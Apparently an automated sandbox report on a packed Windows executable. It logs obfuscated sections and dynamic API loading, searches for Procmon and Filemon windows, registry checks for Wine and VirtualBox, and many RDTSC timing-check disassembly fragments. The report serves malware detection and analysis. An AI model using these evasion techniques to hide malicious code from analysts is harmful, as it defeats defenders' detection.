Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1799168 > 1048576
Source: file.exe | Static PE information: Raw size of tlwqldfy is bigger than: 0x100000 < 0x19d600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tlwqldfy:EW;yxhtoyxo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tlwqldfy:EW;yxhtoyxo:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b8da3 should be: 0x1c1b07
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: tlwqldfy
Source: file.exe | Static PE information: section name: yxhtoyxo
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040B04F push es; ret | 0_2_0040B052
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push ecx; mov dword ptr [esp], edx | 0_2_007A40DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push ebp; mov dword ptr [esp], 000004C3h | 0_2_007A40FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push 2C912851h; mov dword ptr [esp], edx | 0_2_007A41A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push 2E6C5EDDh; mov dword ptr [esp], esi | 0_2_007A41CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push eax; mov dword ptr [esp], edi | 0_2_007A42FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push eax; mov dword ptr [esp], ecx | 0_2_007A43B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push edx; mov dword ptr [esp], esi | 0_2_007A43E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push ebx; mov dword ptr [esp], 28203E82h | 0_2_007A43E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push edx; mov dword ptr [esp], edi | 0_2_007A4405
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push 65E06AC3h; mov dword ptr [esp], ecx | 0_2_007A4419
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push ebx; mov dword ptr [esp], esi | 0_2_007A4425
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C push 630BDEC7h; mov dword ptr [esp], edi | 0_2_007A446A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 03591A81h; mov dword ptr [esp], edx0_2_007A4490
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 7D62D8F3h; mov dword ptr [esp], esi0_2_007A44C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push eax; mov dword ptr [esp], edx0_2_007A4524
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 204BD816h; mov dword ptr [esp], esp0_2_007A452C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 508B0D51h; mov dword ptr [esp], ebp0_2_007A45E1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebp; mov dword ptr [esp], ecx0_2_007A4636
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 2C7ABD21h; mov dword ptr [esp], ebx0_2_007A463E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 49BE69A4h; mov dword ptr [esp], ebx0_2_007A4666
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], ebp0_2_007A46BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push esi; mov dword ptr [esp], 540E84F1h0_2_007A474F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 11E96C3Eh; mov dword ptr [esp], esi0_2_007A477F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], ebp0_2_007A478B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push eax; mov dword ptr [esp], esi0_2_007A4807
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 2211B062h; mov dword ptr [esp], edx0_2_007A48BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebx; mov dword ptr [esp], esp0_2_007A48C1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 3AF8F46Dh; mov dword ptr [esp], ecx0_2_007A4954
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 38A5D187h; mov dword ptr [esp], esi0_2_007A4991
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], eax0_2_007A49E9
              Source: file.exeStatic PE information: section name: tlwqldfy entropy: 7.954230564423373

              Boot Survival

              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00406390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B058A second address: 7B0590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0590 second address: 7B0595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CF60 second address: 79CF66 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF642 second address: 7AF652 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65134596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFC4E second address: 7AFC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFD86 second address: 7AFD90 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF65134596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF0A second address: 7AFF15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2505 second address: 7B250A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B250A second address: 7B2587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 75978EBBh 0x0000000e mov si, cx 0x00000011 mov dword ptr [ebp+122D190Bh], ebx 0x00000017 push 00000003h 0x00000019 sub dword ptr [ebp+122D2D5Fh], esi 0x0000001f push 00000000h 0x00000021 mov ecx, dword ptr [ebp+122D39BBh] 0x00000027 movzx edx, di 0x0000002a push 00000003h 0x0000002c push 9647C4DCh 0x00000031 js 00007FBF65561B59h 0x00000037 jmp 00007FBF65561B53h 0x0000003c add dword ptr [esp], 29B83B24h 0x00000043 jnp 00007FBF65561B4Bh 0x00000049 or si, CF5Eh 0x0000004e lea ebx, dword ptr [ebp+124563D6h] 0x00000054 jmp 00007FBF65561B56h 0x00000059 xchg eax, ebx 0x0000005a push ecx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2587 second address: 7B2595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2595 second address: 7B2599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B268E second address: 7B2702 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 1A93BD23h 0x0000000e sub edx, dword ptr [ebp+122D3823h] 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FBF65134598h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov ch, ah 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2B2Ah], ebx 0x0000003a push 00000003h 0x0000003c and edi, 0703F48Ah 0x00000042 call 00007FBF65134599h 0x00000047 jmp 00007FBF651345A5h 0x0000004c push eax 0x0000004d pushad 0x0000004e jnp 00007FBF6513459Ch 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2702 second address: 7B270A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B270A second address: 7B2726 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF65134596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF6513459Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2726 second address: 7B2743 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65561B4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c js 00007FBF65561B50h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B284B second address: 7B28A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF65134596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 1DE92169h 0x00000012 mov edx, dword ptr [ebp+122D3937h] 0x00000018 push 00000003h 0x0000001a clc 0x0000001b sub ecx, dword ptr [ebp+122D3025h] 0x00000021 push 00000000h 0x00000023 add dword ptr [ebp+122D1911h], esi 0x00000029 push 00000003h 0x0000002b call 00007FBF6513459Fh 0x00000030 jmp 00007FBF6513459Bh 0x00000035 pop ecx 0x00000036 push DC0AFE14h 0x0000003b push eax 0x0000003c push edx 0x0000003d jno 00007FBF65134598h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B28A0 second address: 7B28D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 1C0AFE14h 0x0000000f jnp 00007FBF65561B4Ah 0x00000015 pushad 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 add ecx, dword ptr [ebp+122D36FBh] 0x0000001f lea ebx, dword ptr [ebp+124563EAh] 0x00000025 mov esi, dword ptr [ebp+122D398Fh] 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B28D1 second address: 7B28D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B28D5 second address: 7B28DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3D5D second address: 7C3D62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2786 second address: 7D278C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D278C second address: 7D2796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF65134596h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3BC1 second address: 7A3BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B57h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3BDC second address: 7A3BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D07AE second address: 7D07BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007FBF65561B46h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0A56 second address: 7D0A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0A5B second address: 7D0A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0CF3 second address: 7D0CFD instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF64DC8956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0CFD second address: 7D0D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D11AB second address: 7D11B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D11B1 second address: 7D1202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FBF64E55829h 0x0000000b jmp 00007FBF64E55826h 0x00000010 jmp 00007FBF64E55825h 0x00000015 jnp 00007FBF64E55816h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1462 second address: 7D146E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FBF64DC8956h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D146E second address: 7D1474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A08 second address: 7C9A27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF64DC8960h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A27 second address: 7C9A2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A2F second address: 7C9A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A35 second address: 7C9A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A39 second address: 7C9A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8A7D second address: 7A8A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8A82 second address: 7A8A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8A8A second address: 7A8A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F15 second address: 7D1F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF64DC8956h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F22 second address: 7D1F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF64E55828h 0x00000008 jnl 00007FBF64E55816h 0x0000000e jng 00007FBF64E55816h 0x00000014 jl 00007FBF64E55816h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FBF64E55828h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F6C second address: 7D1F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2387 second address: 7D238D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D238D second address: 7D23A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF64DC8960h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4959 second address: 7D4960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CF4 second address: 797CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CFC second address: 797D3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FBF64E55816h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FBF64E55824h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBF64E55828h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA5A0 second address: 7DA5AA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF64DC8956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA9BD second address: 7DA9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA9C1 second address: 7DA9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9C4F second address: 7D9C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAD65 second address: 7DAD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAD6B second address: 7DAD6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAD6F second address: 7DAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF489 second address: 7DF48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF8EB second address: 7DF8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFB97 second address: 7DFB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFB9C second address: 7DFBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF64DC8965h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFBB8 second address: 7DFC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF64E55825h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jc 00007FBF64E55816h 0x00000014 jmp 00007FBF64E55823h 0x00000019 pop esi 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FBF64E55825h 0x00000022 popad 0x00000023 jnc 00007FBF64E55818h 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f jne 00007FBF64E55816h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFC1B second address: 7DFC21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0413 second address: 7E0417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0497 second address: 7E04AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF64DC8962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E04AD second address: 7E04B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E04B2 second address: 7E0507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 6ADB17C7h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBF64DC8958h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 xor di, A0F1h 0x0000002d call 00007FBF64DC8959h 0x00000032 push eax 0x00000033 push edx 0x00000034 push ebx 0x00000035 jmp 00007FBF64DC8962h 0x0000003a pop ebx 0x0000003b rdtsc
